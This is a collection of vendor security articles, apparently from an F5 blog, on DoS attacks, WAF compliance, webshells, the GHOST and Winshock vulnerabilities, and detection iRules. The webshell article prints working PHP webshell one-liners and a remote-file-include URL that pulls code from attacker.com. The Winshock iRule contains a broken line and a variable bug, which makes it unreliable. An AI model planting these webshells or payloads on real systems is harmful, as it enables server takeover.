Application Security
Layer 4 vs Layer 7 DoS Attack
Not all DoS (Denial of Service) attacks are the same. While the end result is to consume as much - hopefully all - of a server or site's resources so that legitimate users are denied service (hence the name), there is a subtle difference in how these attacks are perpetrated that makes one easier to stop than the other.

SYN Flood

A Layer 4 DoS attack is often referred to as a SYN flood. It works at the transport protocol (TCP) layer. A TCP connection is established in what is known as a 3-way handshake. The client sends a SYN packet, the server responds with a SYN ACK, and the client responds to that with an ACK. After the "three-way handshake" is complete, the TCP connection is considered established. It is at this point that applications begin sending data using a Layer 7 or application layer protocol, such as HTTP.

A SYN flood uses the inherent patience of the TCP stack to overwhelm a server by sending a flood of SYN packets and then ignoring the SYN ACKs returned by the server. This causes the server to use up resources waiting a configured amount of time for the anticipated ACK that should come from a legitimate client. Because web and application servers are limited in the number of concurrent TCP connections they can have open, if an attacker sends enough SYN packets to a server it can easily chew through the allowed number of TCP connections, thus preventing legitimate requests from being answered by the server.

SYN floods are fairly easy for proxy-based application delivery and security products to detect. Because they proxy connections for the servers, and are generally hardware-based with a much higher TCP connection limit, the proxy-based solution can handle the high volume of connections without becoming overwhelmed. Because the proxy-based solution is usually terminating the TCP connection (i.e. it is the "endpoint" of the connection), it will not pass the connection to the server until it has completed the 3-way handshake. Thus, a SYN flood is stopped at the proxy and legitimate connections are passed on to the server with alacrity.

Attackers are generally stopped from flooding the network through the use of SYN cookies. SYN cookies utilize cryptographic hashing and are therefore computationally expensive, making it desirable to let a proxy/delivery solution with hardware-accelerated cryptographic capabilities handle this type of security measure. Servers can implement SYN cookies, but the additional burden placed on the server erases much of the gain achieved by preventing SYN floods and often results in available, but unacceptably slow, servers and sites.

HTTP GET DoS

A Layer 7 DoS attack is a different beast, and it's more difficult to detect. A Layer 7 DoS attack is often perpetrated through the use of HTTP GET. This means that the 3-way TCP handshake has been completed, thereby fooling devices and solutions which only examine Layer 4 and TCP communications. The attacker looks like a legitimate connection and is therefore passed on to the web or application server. At that point the attacker begins requesting large numbers of files/objects using HTTP GET. They are generally legitimate requests; there are just a lot of them. So many, in fact, that the server quickly becomes focused on responding to those requests and has a hard time responding to new, legitimate requests.
When rate-limiting was used to stop this type of attack, the bad guys moved to using a distributed system of bots (zombies) to ensure that the requests (the attack) were coming from myriad IP addresses, making them not only more difficult to detect but also more difficult to stop. The attacker uses malware and trojans to deposit a bot on servers and clients, and then remotely includes them in the attack by instructing the bots to request a list of objects from a specific site or server. The attacker might not use bots at all, but instead might gather enough evil friends to launch an attack against a site that has annoyed them for some reason.

Layer 7 DoS attacks are more difficult to detect because the TCP connection is valid and so are the requests. The trick is to realize when there are multiple clients requesting large numbers of objects at the same time and to recognize that it is, in fact, an attack. This is tricky because there may very well be legitimate requests mixed in with the attack, which means a "deny all" philosophy will result in the very situation the attackers are trying to force: a denial of service.

Defending against Layer 7 DoS attacks usually involves some sort of rate-shaping algorithm that watches clients and ensures that they request no more than a configurable number of objects per time period, usually measured in seconds or minutes. If the client requests more than the configurable number, the client's IP address is blacklisted for a specified time period and subsequent requests are denied until the address has been freed from the blacklist. Because this can still affect legitimate users, layer 7 firewall (application firewall) vendors are working on ways to get smarter about stopping layer 7 DoS attacks without affecting legitimate clients. It is a subtle dance and requires a bit more understanding of the application and its flow, but if implemented correctly it can improve the ability of such devices to detect and prevent layer 7 DoS attacks from reaching web and application servers and taking a site down.

The goal of deploying an application firewall or proxy-based application delivery solution is to ensure the fast and secure delivery of an application. By preventing both layer 4 and layer 7 DoS attacks, such solutions allow servers to continue serving up applications without the degradation in performance caused by dealing with those attacks.
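To make the rate-shaping approach described above concrete, here is a minimal, hypothetical iRule sketch: count requests per client IP in the session table and temporarily blacklist clients that exceed a threshold. The threshold, window, and blacklist duration are illustrative values only, not recommendations, and a production deployment would rely on purpose-built DoS protections rather than this simplified logic.

when HTTP_REQUEST {
    # Illustrative limits: 200 requests per 10-second window, 300-second blacklist
    set max_reqs 200
    set window 10
    set client [IP::client_addr]

    # Reject clients that were already blacklisted
    if { [table lookup -subtable "l7dos_blacklist" $client] ne "" } {
        reject
        return
    }

    # Count this request and start the measurement window on the first hit
    set count [table incr -subtable "l7dos_count" $client]
    if { $count == 1 } {
        table timeout -subtable "l7dos_count" $client $window
    }

    # Over the threshold: blacklist the client and drop the request
    if { $count > $max_reqs } {
        table set -subtable "l7dos_blacklist" $client 1 300
        log local0. "Layer 7 DoS suspect blacklisted: $client"
        reject
    }
}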
Making WAF Simple: Introducing the OWASP Compliance Dashboard

Whether you are a beginner or an expert, there is a truth that I want to let you in on: building and maintaining Web Application Firewall (WAF) security policies can be challenging. How much security do you really need? Is your configuration too much or too little? Have you created an operational nightmare? Many well-intentioned administrators will initially enable every available feature, thinking that it is providing additional security to the application, when in truth, it is hindering it. How, you may ask? False positives and noise. The more noise and false positives, the harder it becomes to find the real attacks and the greater the likelihood that you begin disabling features that ARE providing essential security for your applications.

So… less is better then? That isn't the answer either; what good are our security solutions if they aren't protecting against anything? The key to success, and what we will look at further in this article, is implementing best practice controls that are both measurable and manageable for your organization. The OWASP Application Security Top 10 is a well-respected list of the ten most prevalent and dangerous application layer attacks that you almost certainly should protect your applications from. By first focusing your security controls on the items in the OWASP Top 10, you are improving the manageability of your security solution and getting the most "bang for your buck". Now, the challenge is, how do you take such a list and build real security protections for your applications?

Introducing the OWASP Compliance Dashboard

Protecting your applications against the OWASP Top 10 is not a new thing; in fact, many organizations have been taking this approach for quite some time. The challenge is that most implementations that claim to "protect" against the OWASP Top 10 rely solely on signature-based protections for only a small subset of the list and provide zero insight into your compliance status. The OWASP Compliance Dashboard, introduced in version 15.0 of BIG-IP Advanced WAF, reinvents this idea by providing a holistic and interactive dashboard that clearly measures your compliancy against the OWASP Application Security Top 10. The Top 10 is then broken down into specific security protections, including both positive and negative security controls, that can be enabled, disabled, or ignored directly on the dashboard.

We realize that a WAF policy alone may not provide complete protection across the OWASP Top 10; this is why the dashboard also includes the ability to review and track the compliancy of best practices outside the scope of a WAF alone, such as whether the application is subject to routine patching or vulnerability scanning.

To illustrate this, let’s assume I have created a brand new WAF policy using the Rapid Deployment policy template and accepted all default settings. What compliance score do you think this policy might have? Let's take a look.

Interesting. The policy is 0/10 compliant, and only A2 Broken Authentication and A3 Sensitive Data Exposure have partial compliance. Why is that? The Rapid Deployment template should include some protections by default, shouldn't it? Expanding A1 Injection, we see a list of protections required in order to be marked as compliant. Hovering over the list of attack signatures, we see that each category of signature is in 'Staging' mode - aha! Signatures in staging mode are not enforced and therefore cannot block traffic. Until the signature set is enforced, we do not mark that protection as compliant.
For those of you who have mistakenly left entities such as signatures in staging for longer than desired, this is also a GREAT way to quickly find them. I also said we could interact with the dashboard to influence the compliancy score, so let's demonstrate that. Each item can be enforced DIRECTLY on the dashboard by selecting the "Enforce" checkmark on the right. No need to go into multiple menus; you can enforce all these security settings on a single page and preview the compliance status immediately. If you are happy with your selection, click on "Review & Update" to perform a final review of what the dashboard will be configuring on your behalf before you click on "Save & Apply Policy".

Note: Enforcing signatures before a period of staging may not be a good idea depending on your environment. Staging provides a period to assess signature matches in order to eliminate false positives. Enforcing these signatures too quickly could result in denying legitimate traffic.

Let's review the compliancy of our policy now with these changes applied. As you can see, A1 Injection is now 100% compliant, and other categories have also had their score updated as a result of enforcing these signatures. The reason for this is that there is overlap in the security controls applied across these other categories.

Not all security controls can be fully implemented directly via the dashboard, and as mentioned previously, not all security controls are signature-based. A7 Cross-Site Scripting (XSS) was recalculated as 50% compliant with the signatures we enforced previously, so let's take a look at what else is required for full compliancy. The options available to us are to IGNORE the requirement, meaning we will be granted full compliancy for that item without implementing any protection, or we can manually configure the protection referenced. We may want to ignore a protection if it is not applicable to the application or if it is not in scope for your deployment. Be mindful that ignoring an item means you are potentially misrepresenting the score of your policy; be very certain that the protection you are ignoring is in fact not applicable before doing so. I've selected to ignore the requirement for "Disallowed Meta Characters in Parameters" and my policy is now 100% compliant for A7 Cross-Site Scripting (XSS).

Lastly, we will look at items within the dashboard that fall outside the scope of WAF protections. Under A9 Using Components with Known Vulnerabilities, we are presented with a series of best practices such as “Application and system hardening”, “Application and system patching” and “Vulnerability scanner integration”. Using the dashboard, you can click on the checkmark to the right for "Requirement fulfilled" to indicate that your organization implements these best practices. By doing so, the OWASP Compliance score updates, providing you with real-time visibility into the compliancy of your application.

Conclusion

The OWASP Compliance Dashboard on BIG-IP Advanced WAF is a perfect fit for the security administrator looking to fine-tune and measure either existing or new WAF policies against the OWASP Application Security Top 10. The OWASP Compliance Dashboard not only tracks WAF-specific security protections but also includes general best practices, allowing you to use the dashboard as your one-stop shop to measure the compliancy of ALL your applications.
For many applications, protection against the OWASP Top 10 may be enough, as it provides you with best practices to follow without having to worry about which features to implement and where. Note: Keep in mind that some applications may require additional controls beyond the protections included in the OWASP Top 10 list.

For teams heavily embracing automation and CI/CD pipelines, logging into a GUI to perform changes likely does not sound appealing. In that case, I suggest reading more about our Declarative Advanced WAF policy framework, which can be used to represent WAF policies in any CI/CD pipeline. Combine this with the OWASP Compliance Dashboard for an at-a-glance assessment of your policy and you have the best of both worlds.

If you're not already using the OWASP Compliance Dashboard, what are you waiting for? Look out for Bill Brazill, Victor Granic and myself (Kyle McKay) on June 10th at F5 Agility 2020, where we will be presenting and facilitating a class called "Protecting against the OWASP Top 10". In this class, we will be showcasing the OWASP Compliance Dashboard on BIG-IP Advanced WAF further and providing ample hands-on time fine-tuning and measuring WAF policies for OWASP compliance. Hope to see you there! To learn more, visit the links below.

Links
- OWASP Compliance Dashboard: https://support.f5.com/csp/article/K52596282
- OWASP Application Security Top 10: https://owasp.org/www-project-top-ten/
- Agility 2020: https://www.f5.com/agility/attend
Webshells

Webshells are web scripts (PHP/ASPX/etc.) that act as a control panel for the server running them. A webshell may be legitimately used by the administrator to perform actions on the server, such as:
- Create a user
- Restart a service
- Clean up disk space
- Read logs
- More…

Therefore, a webshell simplifies server management for administrators that are not familiar with (or are less comfortable with) internal system commands using the console. However, webshells have bad connotations as well – they are a very popular post-exploitation tool that allows an attacker to gain full system control.

Webshell Examples

An example of a webshell may be as simple as the following script:

<?php echo(system($_GET["q"])); ?>

This script will read a user-provided value and pass it on to the underlying operating system as a shell command. For instance, issuing the following request will invoke the ‘ls’ command and print the result to the screen:

http://example.com/webshell.php?q=ls

An even simpler example of a webshell may be this:

<?php eval($_GET["q"]); ?>

This script will simply take the contents of the parameter “q” and evaluate it as pure PHP code. Example:

http://example.com/webshell.php?q=echo%20("hello%20world")%3B

From this point, the options are limitless. An attacker that uses a webshell on a compromised server effectively has full control over the application. If the web application is running under root, the attacker has full control over the entire web server as well. In many cases, the neighboring servers on the local network are at risk too.

How does a webshell attack work?

We’ve now seen that a webshell script is a very powerful tool. However, a webshell is a “post-exploitation” tool – meaning an attacker first has to find a vulnerability in the web application, exploit it, and upload their webshell onto the server. One way to achieve this is by first uploading the webshell through a legitimate file upload page (for instance, a CV submission form on a company website) and then using an LFI (Local File Include) weakness in the application to include the webshell in one of the pages. A different approach may be an application vulnerable to arbitrary file write: an attacker may simply write the code to a new file on the server. Another example may be an RFI (Remote File Include) weakness in the application that effectively eliminates the need to upload the webshell onto the server. An attacker may host the webshell on a completely different server, and force the application to include it, like this:

http://vulnerable.com/rfi.php?include=http://attacker.com/webshell.php

The b374k webshell

There are many and varied implementations of webshells. As mentioned, these are not always meant to be used by attackers, but also by system administrators. Some of the “suspicious” webshells that are more popular with attackers are the following:
- c99
- r57
- c100
- PHPjackal
- Locus

In this article we will explore an open source webshell called b374k (https://github.com/b374k/b374k). From the readme:

This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel, connecting using ssh, ftp etc. All actions take place within a web browser

Features:
- File manager (view, edit, rename, delete, upload, download, archiver, etc)
- Search file, file content, folder (also using regex)
- Command execution
- More…

Once we get the webshell up and running, we can view information and perform actions on the server.
Listed below are a few use cases for this webshell that demonstrate the power of webshells and how attackers can benefit from running them on a compromised web server:
- View process information and varied system information.
- Open a terminal and execute various commands, or open a code evaluator to run arbitrary code.
- Open a reverse shell on the server, to make sure access to the server is preserved.
- Issue outgoing HTTP requests from the server.
- Perform social engineering activities to broaden the scope of the attack.

Mitigation using F5 ASM

The F5 ASM module uses detection and prevention methods for each variation of this attack:
- For RFI (Remote File Include): ASM will detect any request that attempts to include an external URL, and prevent access.
- For Unrestricted File Upload + LFI (Local File Include): During an upload or creation attempt of the webshell, ASM will detect the active code and prevent it from reaching the server.
- If the webshell is already on the server, ASM will detect when the application tries to reach the file using LFI and prevent access.
- If the webshell is already on the server and part of the application, ASM will detect when a suspicious page is requested, and prevent that page from being displayed.
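For environments without ASM, a crude subset of the RFI detection described above can also be approximated with network-side scripting. The following is a hypothetical, minimal iRule sketch that rejects requests whose query string parameters appear to contain an absolute URL; it is illustrative only and is nowhere near a substitute for the full signature- and policy-based inspection that ASM performs.

when HTTP_REQUEST {
    # Naive RFI guard: look for a parameter value that starts with a URL scheme
    if { [string tolower [HTTP::query]] matches_regex {(^|&)[^=&]*=(https?|ftp)://} } {
        log local0. "Possible RFI attempt from [IP::client_addr]: [HTTP::uri]"
        HTTP::respond 403 content "Request blocked"
        return
    }
}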
4 reasons not to use mod-security

Apache is a great web server, if for no other reason than it offers more flexibility through modules than just about any other web server. You can plug in all sorts of modules to enhance the functionality of Apache. But as I often say, just because you can doesn't mean you should. One of the modules you can install is mod_security. If you aren't familiar with mod_security, essentially it's a "roll your own" web application firewall plug-in for the Apache web server. Some of the security functions you can implement via mod_security are:
- Simple filtering
- Regular expression based filtering
- URL encoding validation
- Unicode encoding validation
- Auditing
- Null byte attack prevention
- Upload memory limits
- Server identity masking
- Built-in chroot support

Using mod_security you can also implement protocol security, which is an excellent idea for ensuring that holes in protocols aren't exploited. If you aren't sold on protocol security you should read up on the recent DNS vulnerability discovered by Dan Kaminsky - it's all about the protocol and has nothing to do with vulnerabilities introduced by implementation. mod_security provides many options for validating URLs, URIs, and application data. You are, essentially, implementing a custom web application firewall using configuration directives.

If you're on this path then you probably agree that a web application firewall is a good thing, so why would I caution against using mod_security? Well, there are four reasons, actually.

1. It runs on every web server. This is an additional load on the servers that can be easily offloaded for a more efficient architecture. The need for partial duplication of configuration files across multiple machines can also result in the introduction of errors or extraneous, unnecessary configuration. Running mod_security on every web server decreases capacity to serve users and applications accordingly, which may require additional servers to scale to meet demand.

2. You have to become a security expert. You have to understand the attacks you are trying to stop in order to write a rule to prevent them. So either you become an expert or you trust a third party to be the expert. The former takes time and the latter takes guts, as you're introducing unnecessary risk by trusting a third party.

3. You have to become a protocol expert. In addition to understanding all the attacks you're trying to prevent, you must become an expert in the HTTP protocol. Part of providing web application security is to sanitize and enforce the HTTP protocol to ensure it isn't abused to create a hole where none previously appeared. You also have to become an expert in Apache configuration directives, and the specific directives used to configure mod_security.

4. The configuration must be done manually. Unless you're going to purchase a commercially supported version of mod_security, you're writing complex rules manually. You'll need to brush up on your regular expression skills if you're going to attempt this. Maintaining those rules is just as painful, as any update necessarily requires manual intervention.

Of course you could introduce an additional instance of Apache with mod_security installed that essentially proxies all requests through mod_security, thus providing a centralized security architecture, but at that point you've just introduced a huge bottleneck into your infrastructure.
If you're already load-balancing multiple instances of a web site or application, then it's not likely that a single instance of Apache with mod_security is going to be able to handle the volume of requests without increasing downtime or degrading performance to the point where applications might as well be down because they're too painful to use.

Centralizing security can improve performance, reduce the potential avenues of risk through configuration error, and keep your security up to date by providing easy access to updated signatures, patterns, and defenses against existing and emerging web application attacks. Some web application firewalls offer pre-configured templates for specific applications like Microsoft OWA, providing a simple configuration experience that belies the depth of security knowledge applied to protecting the application. Web application firewalls can enable compliance with requirement 6.6 of PCI DSS. And they're built to scale, which means the scenario in which mod_security is used as a reverse proxy to protect all web servers from harm but quickly becomes a bottleneck and an impediment to performance doesn't happen with purpose-built web application firewalls.

If you're considering using mod_security then you already recognize the value of and need for a web application firewall. That's great. But consider carefully where you will deploy that web application firewall, because the decision will have an impact on the performance and availability of your site and applications.
GHOST Vulnerability (CVE-2015-0235)

On the 27th of January, Qualys published a critical vulnerability dubbed “GHOST”, as it can be triggered by the GetHOST functions ( gethostbyname*() ) of the glibc library. Glibc is the main library of C language functionality and is present on most Linux distributions. Those functions are used to resolve a supplied hostname into the corresponding structure, performing a DNS lookup if the hostname is a domain name rather than an IP address. The vulnerable functions are obsolete but are still used by many popular applications such as Apache, MySQL, Nginx and Node.js. So far, this vulnerability has been proven remotely exploitable only against the Exim mail service, while arbitrary code execution on any other system using those vulnerable functions is very context-dependent. Qualys mentioned, through a security mailing list, the applications that were investigated but found not to contain the buffer overflow. Read more on the mailing list archive link below:

http://seclists.org/oss-sec/2015/q1/283

Currently, F5 is not aware of any vulnerable web application, although PHP applications might be potentially vulnerable due to PHP's “gethostbyname()” equivalent.

UPDATE: The WordPress content management system, via its XML-RPC pingback functionality, was found to be vulnerable to the GHOST vulnerability. WordPress automatically notifies popular Update Services that you've updated your blog by sending an XML-RPC ping each time you create or update a post. By sending a specially crafted hostname as a parameter of the XML-RPC pingback method, a vulnerable WordPress installation will return an HTTP "500" response, or no response at all, as a result of memory corruption. However, exploitability has not yet been proven.

Using ASM to Mitigate the WordPress GHOST Exploit

As the crafted hostname needs to be around 1,000 characters to trigger the vulnerability, limiting request size will mitigate the threat. Add the following user-defined attack signature to detect and prevent potential exploitation of this specific vulnerability on WordPress systems.

For versions greater than 11.2.x:

uricontent:"xmlrpc.php"; objonly; nocase; content:"methodcall"; nocase; re2:"/https?://(?:.*?)?[\d\.]{500}/i";

For versions below 11.2.x:

uricontent:"xmlrpc.php"; objonly; nocase; content:"methodcall"; nocase; pcre:"/https?://(?:.*?)?[\d\.]{500}/i";

This signature will catch any request to the "xmlrpc.php" URL which contains an IPv4-format hostname greater than 500 characters.

iRule Mitigation for the Exim GHOST Exploit

At this time, only Exim mail servers are known to be exploitable remotely, if configured to verify hosts after the EHLO/HELO command in an SMTP session. If you run the Exim mail server behind a BIG-IP, the following iRule will detect and mitigate exploitation attempts:

when CLIENT_ACCEPTED {
    TCP::collect
}
when CLIENT_DATA {
    if { ( [string toupper [TCP::payload]] starts_with "HELO " or [string toupper [TCP::payload]] starts_with "EHLO " ) and ( [TCP::payload length] > 1000 ) } {
        log local0. "Detected GHOST exploitation attempt"
        TCP::close
    }
    TCP::release
    TCP::collect
}

This iRule will catch any HELO/EHLO command greater than 1000 bytes. Create a new iRule and attach it to your virtual server.
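Returning to the WordPress case above: if ASM is not available, a rough approximation of that signature can be sketched as an iRule that inspects POST bodies sent to xmlrpc.php. This is a hypothetical illustration only; the 250-character run of digits and dots is a looser stand-in for the 500-character pattern in the ASM signature (Tcl regular expressions cap bound quantifiers at 255), and the collection size limit is an arbitrary illustrative value.

when HTTP_REQUEST {
    # Only inspect pingback-style POSTs to xmlrpc.php
    if { [HTTP::method] eq "POST" && [string tolower [HTTP::uri]] contains "xmlrpc.php" } {
        set clen [HTTP::header value "Content-Length"]
        if { $clen ne "" && $clen > 0 } {
            # Cap what we buffer to keep memory use bounded (illustrative limit)
            if { $clen > 1048576 } { set clen 1048576 }
            HTTP::collect $clen
        }
    }
}
when HTTP_REQUEST_DATA {
    # A long dotted-numeric hostname inside a URL is the GHOST trigger pattern
    if { [regexp {https?://[^"'<>\s]*[\d.]{250,}} [HTTP::payload]] } {
        log local0. "Possible GHOST/xmlrpc attempt from [IP::client_addr]"
        HTTP::respond 403 content "Request blocked"
        return
    }
    HTTP::release
}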
Mitigating Winshock (CVE-2014-6321) Vulnerabilities Using BIG-IP iRules

Recently we’ve witnessed yet another earth-shattering vulnerability in a popular and very fundamental service. Dubbed Winshock, it joins Heartbleed, Shellshock and POODLE in the pantheon of critical vulnerabilities discovered in 2014. Winshock (CVE-2014-6321) earns a 10.0 CVSS score due to being related to a service as common as TLS, and potentially allowing remote arbitrary code execution.

SChannel

From MSDN: Secure Channel, also known as Schannel, is a security support provider (SSP) that contains a set of security protocols that provide identity authentication and secure, private communication through encryption. Basically, SChannel is Microsoft’s implementation of TLS, and it is used in various Microsoft services that support encryption and authentication, such as Internet Information Services (IIS), Remote Desktop Protocol, Exchange and Outlook Web Access, SharePoint, Active Directory and more. Naturally, SChannel also contains an implementation of the TLS handshake protocol, which is performed before every secure session is established between the client and the server.

The TLS Handshake

The following diagram shows what a typical TLS handshake looks like.

Image source: http://www-01.ibm.com/support/knowledgecenter/SSFKSJ_7.1.0/com.ibm.mq.doc/sy10660_.htm?lang=en

The handshake is used by the client and the server to agree on the terms of the connection. The handshake is conducted using messages, for the purpose of authenticating between the server and the client, agreeing on cipher suites, and exchanging public keys using certificates. Each type of message is passed on the wire as a unique “TLS record”. Several messages (TLS records) may be sent over one packet. Some of the known TLS records are the following:
- Client Hello – The client announces it would like to initiate a connection with the server. It also presents all the various cipher suites it can support. This record may also have numerous extensions used to provide even more data.
- Server Hello – The server acknowledges the Client Hello and presents its own information.
- Certificate Request – In some scenarios, the client is required to present its certificate in order to authenticate itself. This is known as two-way authentication (or mutual authentication). The Certificate Request message is sent by the server and forces the client to present a valid certificate before the handshake is successful.
- Certificate – A message used to transfer the contents of a certificate, including subject name, issuer, public key and more.
- Certificate Verify – Contains a value signed using the client’s private key. It is presented by the client along with their certificate during a 2-way handshake, and serves as proof that the client actually holds the certificate it claims to.

SChannel Vulnerabilities

Two vulnerabilities were found in the way SChannel handles those TLS records. One vulnerability occurs when parsing the “server_name” extension of the Client Hello message. This extension is typically used to specify the host name which the client is trying to connect to on the target server. In some ways this is similar to the HTTP “Host” header. It was found that SChannel will not properly manage memory allocation when this record contains more than one server name. This vulnerability leads to denial of service by memory exhaustion. The other vulnerability occurs when an invalid signed value is presented inside a Certificate Verify message.
It was found that values larger than what the server expects will be written to memory beyond the allocated buffer scope. This behavior may result in potential remote code execution.

Mitigation with BIG-IP iRules

SSL offloading using BIG-IP is inherently not vulnerable, as it does not relay vulnerable messages to the backend server. However, in a “pass-through” scenario, where all the TLS handshake messages are forwarded without inspection, backend servers may be vulnerable to these attacks. The following iRule will detect and mitigate attempts to exploit the above SChannel vulnerabilities:

when CLIENT_ACCEPTED {
    TCP::collect
    set MAX_TLS_RECORDS 16
    set iPacketCounter 0
    set iRecordPointer 0
    set sPrimeCurve ""
    set iMessageLength 0
}
when CLIENT_DATA {
    #log local0. "New TCP packet. Length [TCP::payload length]. Packet Counter $iPacketCounter"
    set bScanTLSRecords 0
    if { $iPacketCounter == 0 } {
        binary scan [TCP::payload] cSS tls_xacttype tls_version tls_recordlen
        if { [info exists tls_xacttype] && [info exists tls_version] && [info exists tls_recordlen] } {
            if { ($tls_version == "769" || $tls_version == "770" || $tls_version == "771") && $tls_xacttype == 22 } {
                set bScanTLSRecords 1
            }
        }
    }
    if { $iPacketCounter > 0 } {
        # Got here mid record, collect more fragments
        #log local0. "Gather. tls rec $tls_recordlen, ptr $iRecordPointer"
        if { [expr {$iRecordPointer + $tls_recordlen + 5}] <= [TCP::payload length] } {
            #log local0. "Full record received"
            set bScanTLSRecords 1
        } else {
            #log local0. "Record STILL fragmented"
            set iPacketCounter [expr {$iPacketCounter + 1}]
            TCP::collect
        }
    }
    if { $bScanTLSRecords } {
        # Start scanning records
        set bNextRecord 1
        set bKill 0
        while { $bNextRecord >= 1 } {
            #log local0. "Reading next record. ptr $iRecordPointer"
            binary scan [TCP::payload] @${iRecordPointer}cSS tls_xacttype tls_version tls_recordlen
            #log local0. "SSL Record Type $tls_xacttype , Version: $tls_version , Record Length: $tls_recordlen"
            if { [expr {$iRecordPointer + $tls_recordlen + 5}] <= [TCP::payload length] } {
                binary scan [TCP::payload] @[expr {$iRecordPointer + 5}]c tls_action
                if { $tls_xacttype == 22 && $tls_action == 1 } {
                    #log local0. "Client Hello"
                    set iRecordOffset [expr {$iRecordPointer + 43}]
                    binary scan [TCP::payload] @${iRecordOffset}c tls_sessidlen
                    set iRecordOffset [expr {$iRecordOffset + 1 + $tls_sessidlen}]
                    binary scan [TCP::payload] @${iRecordOffset}S tls_ciphlen
                    set iRecordOffset [expr {$iRecordOffset + 2 + $tls_ciphlen}]
                    binary scan [TCP::payload] @${iRecordOffset}c tls_complen
                    set iRecordOffset [expr {$iRecordOffset + 1 + $tls_complen}]
                    binary scan [TCP::payload] @${iRecordOffset}S tls_extenlen
                    set iRecordOffset [expr {$iRecordOffset + 2}]
                    binary scan [TCP::payload] @${iRecordOffset}a* tls_extensions
                    for { set i 0 } { $i < $tls_extenlen } { incr i 4 } {
                        set iExtensionOffset [expr {$i}]
                        binary scan $tls_extensions @${iExtensionOffset}SS etype elen
                        if { ($etype == "00") } {
                            set iScanStart [expr {$iExtensionOffset + 9}]
                            set iScanLength [expr {$elen - 5}]
                            binary scan $tls_extensions @${iScanStart}A${iScanLength} tls_servername
                            if { [regexp \x00 $tls_servername] } {
                                log local0. "Winshock detected - NULL character in host name. Server Name: $tls_servername"
                                set bKill 1
                            } else {
                                #log local0. "Server Name found valid: $tls_servername"
                            }
                            set iExtensionOffset [expr {$iExtensionOffset + $elen}]
                        } else {
"Uninteresting extension $etype" set iExtensionOffset [expr {$iExtensionOffset + $elen}] } set i $iExtensionOffset } } elseif { $tls_xacttype == 22 && $tls_action == 11 } { #log local0. "Certificate" set iScanStart [expr {$iRecordPointer + 17}] set iScanLength [expr {$tls_recordlen - 12}] binary scan [TCP::payload] @${iScanStart}A${iScanLength} client_certificate if { [regexp {\x30\x59\x30\x13\x06\x07\x2a\x86\x48\xce\x3d\x02\x01(\x06\x08\x2a\x86\x48\xce\x3d\x03\x01\x07|\x06\x05\x2b\x81\x04\x00(?:\x22|\x23))} $client_certificate reMatchAll reMatch01] } { #log local0. $match01 switch $reMatch01 { "\x06\x08\x2a\x86\x48\xce\x3d\x03\x01\x07" { set sPrimeCurve "P-256" } "\x06\x05\x2b\x81\x04\x00\x22" { set sPrimeCurve "P-384" } "\x06\x05\x2b\x81\x04\x00\x23" { set sPrimeCurve "P-521" } default { #log local0. "Invalid curve" } } } } elseif { $tls_xacttype == 22 && $tls_action == 15 } { #log local0. "Certificate Verify" set iScanStart [expr {$iRecordPointer + 11}] set iScanLength [expr {$tls_recordlen - 6}] binary scan [TCP::payload] @${iScanStart}A${iScanLength} client_signature binary scan $client_signature c cSignatureHeader if { $cSignatureHeader == 48 } { binary scan $client_signature @3c r_len set s_len_offset [expr {$r_len + 5}] binary scan $client_signature @${s_len_offset}c s_len set iMessageLength $r_len if { $iMessageLength < $s_len } { set iMessageLength $s_len } } else { #log local0. "Sig header invalid" } } else { #log local0. "Uninteresting TLS action" } # Curve and length found - check Winshock if { $sPrimeCurve ne "" && $iMessageLength > 0 } { set iMaxLength 0 switch $sPrimeCurve { "P-256" { set $iMaxLength 33 } "P-384" { set $iMaxLength 49 } "P-521" { set $iMaxLength 66 } } if { $iMessageLength > $iMaxLength } { log local0. "Winshock detected - Invalid message length (found: $iMessageLength, max:$iMaxLength)" set bKill 1 } } # Exploit found, close connection if { $bKill } { TCP::close set bNextRecord 0 } else { # Next record set iRecordPointer [expr {$iRecordPointer + $tls_recordlen + 5}] if { $iRecordPointer == [TCP::payload length]} { # End of records => Assume it is the end of the packet. #log local0. "End of records" set bNextRecord 0 set iPacketCounter 0 set iRecordPointer 0 set sPrimeCurve "" set iMessageLength 0 TCP::release TCP::collect } else { if { $bNextRecord < $MAX_TLS_RECORDS } { set bNextRecord [expr {$bNextRecord + 1}] } else { set bNextRecord 0 #log local0. "Too many loops over TLS records, exit now" TCP::release TCP::collect } } } } else { #log local0. "Record fragmented" set bNextRecord 0 set iPacketCounter [expr {$iPacketCounter + 1}] TCP::collect } } } else { # Exit here if packet is not TLS handshake if { $iPacketCounter == 0 } { TCP::release TCP::collect } } } Create a new iRule and attach it to your virtual server.1.2KViews0likes13CommentsBeware Using Internal Encryption as an IT Security Blanket
Beware Using Internal Encryption as an IT Security Blanket

It certainly sounds reasonable: networks are moving toward a perimeter-less model, so the line between internal and external networks is blurring. The introduction of cloud computing as overdraft protection (cloud-bursting) further blurs that perimeter such that it’s more a suggestion than a rule. That makes the idea of encrypting everything, whether it’s on the internal or external network, seem to be a reasonable one. Or does it?

THE IMPACT ON OPERATIONS

A recent post posits that PCI Standard or Not, Encrypting Internal Network Traffic is a Good Thing. The arguments are valid, but there is a catch (there’s always a catch). Consider this nugget from the article:

"Bottom line is everyone with confidential data to protect should enable encryption on all internal networks with access to that data. In addition, layer 2 security features should be enabled on the access switches carrying said data. Be sure to unencrypt your data streams before sending them to IPS, DLP, and other deep packet inspection devices. This is easy to say but in many cases harder to implement in practice. If you run into any issues feel free to post them here. I realize this is a controversial topic for security geeks (like myself) but given recent PCI breaches that took advantage of the above weaknesses, I have to error on the side of security. Sure more security doesn’t always mean better security, but smarter security always equals better security, which I believe is the case here." [emphasis added]

It is the reminder to decrypt data streams before sending them to IPS, DLP, and other “deep packet inspection devices” that brings to light one of the issues with such a decision: complexity of operations and management. It isn’t just the additional latency inherent in the decryption of secured data streams, required for a large number of the devices in an architecture to perform their tasks, that’s the problem, though that is certainly a concern. The larger problem is the operational inefficiency that comes from the decryption of secured data at multiple points in the architecture.

See, there’s this little thing called “keys” that has to be shared with every device in the data center that will decrypt data, and that means managing each of those key stores in their own right. Keys are the, well, key to the kingdom of data encryption, and if they are lost or stolen it can be disastrous to the security of all affected systems and applications. By better securing data in flight through encryption of all data on the internal network, an additional layer of insecurity is introduced that must be managed.

But let’s pretend this additional security issue doesn’t exist, that all systems on which these keys are stored are secure (ha!). Operations must still (a) configure every inline device to decrypt and re-encrypt the data stream and (b) manage the keys/certificates on every inline device. That’s in addition to managing the keys/certificates on every endpoint for which data is destined. There’s also the possibility that intermediate devices for which data will be decrypted before receiving – often implemented using spanned/mirrored ports on a switch/router – will require a re-architecting of the network in order to implement such an architecture.

